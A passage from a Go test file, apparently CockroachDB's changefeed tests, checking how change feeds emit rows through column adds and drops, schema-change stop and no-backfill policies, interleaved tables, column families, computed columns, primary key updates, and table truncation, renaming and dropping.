fmt.Sprintf(`add_col_comp: [1]->{"after": {"a": 1, "b": 6, "c": 11}, "updated": "%s"}`,
ts.AsOfSystemTime()),
fmt.Sprintf(`add_col_comp: [2]->{"after": {"a": 2, "b": 7, "c": 12}, "updated": "%s"}`,
ts.AsOfSystemTime()),
})
})
t.Run(`drop column`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, '1')`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2, '2')`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column WITH updated`)
defer closeFeed(t, dropColumn)
assertPayloadsStripTs(t, dropColumn, []string{
`drop_column: [1]->{"after": {"a": 1, "b": "1"}}`,
`drop_column: [2]->{"after": {"a": 2, "b": "2"}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
ts := fetchDescVersionModificationTime(t, db, f, `drop_column`, 2)
assertPayloads(t, dropColumn, []string{
fmt.Sprintf(`drop_column: [1]->{"after": {"a": 1}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`drop_column: [2]->{"after": {"a": 2}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (3)`)
assertPayloadsStripTs(t, dropColumn, []string{
`drop_column: [3]->{"after": {"a": 3}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run(`multiple alters`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE multiple_alters (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO multiple_alters VALUES (1, '1')`)
sqlDB.Exec(t, `INSERT INTO multiple_alters VALUES (2, '2')`)
// Set up a hook to pause the changfeed on the next emit.
var wg sync.WaitGroup
waitSinkHook := func(_ context.Context) error {
wg.Wait()
return nil
}
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = waitSinkHook
multipleAlters := feed(t, f, `CREATE CHANGEFEED FOR multiple_alters WITH updated`)
defer closeFeed(t, multipleAlters)
assertPayloadsStripTs(t, multipleAlters, []string{
`multiple_alters: [1]->{"after": {"a": 1, "b": "1"}}`,
`multiple_alters: [2]->{"after": {"a": 2, "b": "2"}}`,
})
// Wait on the next emit, queue up three ALTERs. The next poll process
// will see all of them at once.
wg.Add(1)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters DROP COLUMN b`)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters ADD COLUMN c STRING DEFAULT 'cee'`)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters ADD COLUMN d STRING DEFAULT 'dee'`)
wg.Done()
ts := fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 2)
// Changefeed level backfill for DROP COLUMN b.
assertPayloads(t, multipleAlters, []string{
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
assertPayloadsStripTs(t, multipleAlters, []string{
// Schema-change backfill for DROP COLUMN b.
`multiple_alters: [1]->{"after": {"a": 1}}`,
`multiple_alters: [2]->{"after": {"a": 2}}`,
// Schema-change backfill for ADD COLUMN c.
`multiple_alters: [1]->{"after": {"a": 1}}`,
`multiple_alters: [2]->{"after": {"a": 2}}`,
})
ts = fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 7)
// Changefeed level backfill for ADD COLUMN c.
assertPayloads(t, multipleAlters, []string{
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1, "c": "cee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2, "c": "cee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
// Schema change level backfill for ADD COLUMN d.
assertPayloadsStripTs(t, multipleAlters, []string{
`multiple_alters: [1]->{"after": {"a": 1, "c": "cee"}}`,
`multiple_alters: [2]->{"after": {"a": 2, "c": "cee"}}`,
})
ts = fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 10)
// Changefeed level backfill for ADD COLUMN d.
assertPayloads(t, multipleAlters, []string{
// Backfill no-ops for column D (C schema change is complete)
// TODO(dan): Track duplicates more precisely in sinklessFeed/tableFeed.
// Scan output for column C
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1, "c": "cee", "d": "dee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2, "c": "cee", "d": "dee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
// fetchDescVersionModificationTime fetches the `ModificationTime` of the specified
// `version` of `tableName`'s table descriptor.
func fetchDescVersionModificationTime(
t testing.TB, db *gosql.DB, f cdctest.TestFeedFactory, tableName string, version int,
) hlc.Timestamp {
tblKey := roachpb.Key(keys.MakeTablePrefix(keys.DescriptorTableID))
header := roachpb.RequestHeader{
Key: tblKey,
EndKey: tblKey.PrefixEnd(),
}
dropColTblID := sqlutils.QueryTableID(t, db, `d`, "public", tableName)
req := &roachpb.ExportRequest{
RequestHeader: header,
MVCCFilter: roachpb.MVCCFilter_All,
StartTime: hlc.Timestamp{},
ReturnSST: true,
}
clock := hlc.NewClock(hlc.UnixNano, time.Minute)
hh := roachpb.Header{Timestamp: clock.Now()}
res, pErr := kv.SendWrappedWith(context.Background(),
f.Server().DB().NonTransactionalSender(), hh, req)
if pErr != nil {
t.Fatal(pErr.GoError())
}
for _, file := range res.(*roachpb.ExportResponse).Files {
it, err := storage.NewMemSSTIterator(file.SST, false /* verify */)
if err != nil {
t.Fatal(err)
}
defer it.Close()
for it.SeekGE(storage.NilKey); ; it.Next() {
if ok, err := it.Valid(); err != nil {
t.Fatal(err)
} else if !ok {
continue
}
k := it.UnsafeKey()
remaining, _, _, err := sqlbase.DecodeTableIDIndexID(k.Key)
if err != nil {
t.Fatal(err)
}
_, tableID, err := encoding.DecodeUvarintAscending(remaining)
if err != nil {
t.Fatal(err)
}
if tableID != uint64(dropColTblID) {
continue
}
unsafeValue := it.UnsafeValue()
if unsafeValue == nil {
t.Fatal(errors.New(`value was dropped or truncated`))
}
value := roachpb.Value{RawBytes: unsafeValue}
var desc sqlbase.Descriptor
if err := value.GetProto(&desc); err != nil {
t.Fatal(err)
}
if tableDesc := desc.Table(k.Timestamp); tableDesc != nil {
if int(tableDesc.Version) == version {
return tableDesc.ModificationTime
}
}
}
}
t.Fatal(errors.New(`couldn't find table desc for given version`))
return hlc.Timestamp{}
}
// Regression test for #34314
func TestChangefeedAfterSchemaChangeBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE after_backfill (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO after_backfill VALUES (0)`)
sqlDB.Exec(t, `ALTER TABLE after_backfill ADD COLUMN b INT DEFAULT 1`)
sqlDB.Exec(t, `INSERT INTO after_backfill VALUES (2, 3)`)
afterBackfill := feed(t, f, `CREATE CHANGEFEED FOR after_backfill`)
defer closeFeed(t, afterBackfill)
assertPayloads(t, afterBackfill, []string{
`after_backfill: [0]->{"after": {"a": 0, "b": 1}}`,
`after_backfill: [2]->{"after": {"a": 2, "b": 3}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
func TestChangefeedInterleaved(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE grandparent (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (0, 'grandparent-0')`)
grandparent := feed(t, f, `CREATE CHANGEFEED FOR grandparent`)
defer closeFeed(t, grandparent)
assertPayloads(t, grandparent, []string{
`grandparent: [0]->{"after": {"a": 0, "b": "grandparent-0"}}`,
})
sqlDB.Exec(t,
`CREATE TABLE parent (a INT PRIMARY KEY, b STRING) `+
`INTERLEAVE IN PARENT grandparent (a)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (1, 'grandparent-1')`)
sqlDB.Exec(t, `INSERT INTO parent VALUES (1, 'parent-1')`)
parent := feed(t, f, `CREATE CHANGEFEED FOR parent`)
defer closeFeed(t, parent)
assertPayloads(t, grandparent, []string{
`grandparent: [1]->{"after": {"a": 1, "b": "grandparent-1"}}`,
})
assertPayloads(t, parent, []string{
`parent: [1]->{"after": {"a": 1, "b": "parent-1"}}`,
})
sqlDB.Exec(t,
`CREATE TABLE child (a INT PRIMARY KEY, b STRING) INTERLEAVE IN PARENT parent (a)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (2, 'grandparent-2')`)
sqlDB.Exec(t, `INSERT INTO parent VALUES (2, 'parent-2')`)
sqlDB.Exec(t, `INSERT INTO child VALUES (2, 'child-2')`)
child := feed(t, f, `CREATE CHANGEFEED FOR child`)
defer closeFeed(t, child)
assertPayloads(t, grandparent, []string{
`grandparent: [2]->{"after": {"a": 2, "b": "grandparent-2"}}`,
})
assertPayloads(t, parent, []string{
`parent: [2]->{"after": {"a": 2, "b": "parent-2"}}`,
})
assertPayloads(t, child, []string{
`child: [2]->{"after": {"a": 2, "b": "child-2"}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedColumnFamily(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Table with 2 column families.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING, FAMILY (a), FAMILY (b))`)
if strings.Contains(t.Name(), `enterprise`) {
sqlDB.ExpectErr(t, `exactly 1 column family`, `CREATE CHANGEFEED FOR foo`)
} else {
sqlDB.ExpectErr(t, `exactly 1 column family`, `EXPERIMENTAL CHANGEFEED FOR foo`)
}
// Table with a second column family added after the changefeed starts.
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY, FAMILY f_a (a))`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (0)`)
bar := feed(t, f, `CREATE CHANGEFEED FOR bar`)
defer closeFeed(t, bar)
assertPayloads(t, bar, []string{
`bar: [0]->{"after": {"a": 0}}`,
})
sqlDB.Exec(t, `ALTER TABLE bar ADD COLUMN b STRING CREATE FAMILY f_b`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (1)`)
if _, err := bar.Next(); !testutils.IsError(err, `exactly 1 column family`) {
t.Errorf(`expected "exactly 1 column family" error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedStopOnSchemaChange(t *testing.T) {
defer leaktest.AfterTest(t)()
if testing.Short() || util.RaceEnabled {
t.Skip("takes too long with race enabled")
}
schemaChangeTimestampRegexp := regexp.MustCompile(`schema change occurred at ([0-9]+\.[0-9]+)`)
timestampStrFromError := func(t *testing.T, err error) string {
require.Regexp(t, schemaChangeTimestampRegexp, err)
m := schemaChangeTimestampRegexp.FindStringSubmatch(err.Error())
return m[1]
}
waitForSchemaChangeErrorAndCloseFeed := func(t *testing.T, f cdctest.TestFeed) (tsStr string) {
t.Helper()
for {
if ev, err := f.Next(); err != nil {
log.Infof(context.TODO(), "got event %v %v", ev, err)
tsStr = timestampStrFromError(t, err)
_ = f.Close()
return tsStr
}
}
}
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Shorten the intervals so this test doesn't take so long. We need to wait
// for timestamps to get resolved.
sqlDB.Exec(t, "SET CLUSTER SETTING changefeed.experimental_poll_interval = '200ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.target_duration = '50ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.close_fraction = .99")
t.Run("add column not null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_not_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_not_null`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (0)`)
addColumnNotNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (1)`)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [0]->{"after": {"a": 0}}`,
`add_column_not_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_not_null ADD COLUMN b INT NOT NULL DEFAULT 0`)
sqlDB.Exec(t, "INSERT INTO add_column_not_null VALUES (2, 1)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addColumnNotNull)
addColumnNotNull = feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addColumnNotNull)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [2]->{"after": {"a": 2, "b": 1}}`,
})
})
t.Run("add column null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_null`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (0)`)
addColumnNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (1)`)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [0]->{"after": {"a": 0}}`,
`add_column_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_null ADD COLUMN b INT`)
sqlDB.Exec(t, "INSERT INTO add_column_null VALUES (2, NULL)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addColumnNull)
addColumnNull = feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addColumnNull)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_comp_col (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_comp_col`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (0)`)
addCompCol := feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (1)`)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [0]->{"after": {"a": 0}}`,
`add_comp_col: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_comp_col ADD COLUMN b INT AS (a + 1) STORED`)
sqlDB.Exec(t, "INSERT INTO add_comp_col VALUES (2)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addCompCol)
addCompCol = feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addCompCol)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [2]->{"after": {"a": 2, "b": 3}}`,
})
})
t.Run("drop column", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE drop_column`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (0, NULL)`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, 2)`)
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0, "b": null}}`,
`drop_column: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2)`)
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, dropColumn)
dropColumn = feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, dropColumn)
// NB: You might expect to only see the new row here but we'll see them
// all because we cannot distinguish between the index backfill and
// foreground writes. See #35738.
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run("add index", func(t *testing.T) {
// This case does not exit
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE add_index`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (0, NULL)`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, 2)`)
assertPayloads(t, addIndex, []string{
`add_index: [0]->{"after": {"a": 0, "b": null}}`,
`add_index: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `CREATE INDEX ON add_index (b)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, NULL)`)
assertPayloads(t, addIndex, []string{
`add_index: [2]->{"after": {"a": 2, "b": null}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedNoBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
if testing.Short() || util.RaceEnabled {
t.Skip("takes too long with race enabled")
}
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Shorten the intervals so this test doesn't take so long. We need to wait
// for timestamps to get resolved.
sqlDB.Exec(t, "SET CLUSTER SETTING changefeed.experimental_poll_interval = '200ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.target_duration = '50ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.close_fraction = .99")
t.Run("add column not null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_not_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_not_null`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (0)`)
addColumnNotNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addColumnNotNull)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (1)`)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [0]->{"after": {"a": 0}}`,
`add_column_not_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_not_null ADD COLUMN b INT NOT NULL DEFAULT 0`)
sqlDB.Exec(t, "INSERT INTO add_column_not_null VALUES (2, 1)")
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [2]->{"after": {"a": 2, "b": 1}}`,
})
})
t.Run("add column null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_null`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (0)`)
addColumnNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addColumnNull)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (1)`)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [0]->{"after": {"a": 0}}`,
`add_column_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_null ADD COLUMN b INT`)
sqlDB.Exec(t, "INSERT INTO add_column_null VALUES (2, NULL)")
assertPayloads(t, addColumnNull, []string{
`add_column_null: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_comp_col (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_comp_col`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (0)`)
addCompCol := feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addCompCol)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (1)`)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [0]->{"after": {"a": 0}}`,
`add_comp_col: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_comp_col ADD COLUMN b INT AS (a + 1) STORED`)
sqlDB.Exec(t, "INSERT INTO add_comp_col VALUES (2)")
assertPayloads(t, addCompCol, []string{
`add_comp_col: [2]->{"after": {"a": 2, "b": 3}}`,
})
})
t.Run("drop column", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE drop_column`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (0, NULL)`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, dropColumn)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, 2)`)
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0, "b": null}}`,
`drop_column: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2)`)
// NB: You might expect to only see the new row here but we'll see them
// all because we cannot distinguish between the index backfill and
// foreground writes. See #35738.
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run("add index", func(t *testing.T) {
// This case does not exit
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE add_index`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (0, NULL)`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, 2)`)
assertPayloads(t, addIndex, []string{
`add_index: [0]->{"after": {"a": 0, "b": null}}`,
`add_index: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `CREATE INDEX ON add_index (b)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, NULL)`)
assertPayloads(t, addIndex, []string{
`add_index: [2]->{"after": {"a": 2, "b": null}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedComputedColumn(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// TODO(dan): Also test a non-STORED computed column once we support them.
sqlDB.Exec(t, `CREATE TABLE cc (
a INT, b INT AS (a + 1) STORED, c INT AS (a + 2) STORED, PRIMARY KEY (b, a)
)`)
sqlDB.Exec(t, `INSERT INTO cc (a) VALUES (1)`)
cc := feed(t, f, `CREATE CHANGEFEED FOR cc`)
defer closeFeed(t, cc)
assertPayloads(t, cc, []string{
`cc: [2, 1]->{"after": {"a": 1, "b": 2, "c": 3}}`,
})
sqlDB.Exec(t, `INSERT INTO cc (a) VALUES (10)`)
assertPayloads(t, cc, []string{
`cc: [11, 10]->{"after": {"a": 10, "b": 11, "c": 12}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedUpdatePrimaryKey(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// This NOT NULL column checks a regression when used with UPDATE-ing a
// primary key column or with DELETE.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING NOT NULL)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'bar')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "bar"}}`,
})
sqlDB.Exec(t, `UPDATE foo SET a = 1`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": null}`,
`foo: [1]->{"after": {"a": 1, "b": "bar"}}`,
})
sqlDB.Exec(t, `DELETE FROM foo`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedTruncateRenameDrop(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE truncate (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `CREATE TABLE truncate_cascade (b INT PRIMARY KEY REFERENCES truncate (a))`)
sqlDB.Exec(t,
`BEGIN; INSERT INTO truncate VALUES (1); INSERT INTO truncate_cascade VALUES (1); COMMIT`)
truncate := feed(t, f, `CREATE CHANGEFEED FOR truncate`)
defer closeFeed(t, truncate)
truncateCascade := feed(t, f, `CREATE CHANGEFEED FOR truncate_cascade`)
defer closeFeed(t, truncateCascade)
assertPayloads(t, truncate, []string{`truncate: [1]->{"after": {"a": 1}}`})
assertPayloads(t, truncateCascade, []string{`truncate_cascade: [1]->{"after": {"b": 1}}`})
sqlDB.Exec(t, `TRUNCATE TABLE truncate CASCADE`)
if _, err := truncate.Next(); !testutils.IsError(err, `"truncate" was dropped or truncated`) {
t.Errorf(`expected ""truncate" was dropped or truncated" error got: %+v`, err)
}
if _, err := truncateCascade.Next(); !testutils.IsError(
err, `"truncate_cascade" was dropped or truncated`,
) {
t.Errorf(`expected ""truncate_cascade" was dropped or truncated" error got: %+v`, err)
}
sqlDB.Exec(t, `CREATE TABLE rename (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO rename VALUES (1)`)
rename := feed(t, f, `CREATE CHANGEFEED FOR rename`)
defer closeFeed(t, rename)
assertPayloads(t, rename, []string{`rename: [1]->{"after": {"a": 1}}`})
sqlDB.Exec(t, `ALTER TABLE rename RENAME TO renamed`)
sqlDB.Exec(t, `INSERT INTO renamed VALUES (2)`)
if _, err := rename.Next(); !testutils.IsError(err, `"rename" was renamed to "renamed"`) {
t.Errorf(`expected ""rename" was renamed to "renamed"" error got: %+v`, err)
}
sqlDB.Exec(t, `CREATE TABLE drop (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO drop VALUES (1)`)
drop := feed(t, f, `CREATE CHANGEFEED FOR drop`)
defer closeFeed(t, drop)
assertPayloads(t, drop, []string{`drop: [1]->{"after": {"a": 1}}`})
sqlDB.Exec(t, `DROP TABLE drop`)
if _, err := drop.Next(); !testutils.IsError(err, `"drop" was dropped or truncated`) {
t.Errorf(`expected ""drop" was dropped or truncated" error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMonitoring(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
beforeEmitRowCh := make(chan struct{}, 2)
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
<-beforeEmitRowCh
return nil
}
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
s := f.Server()
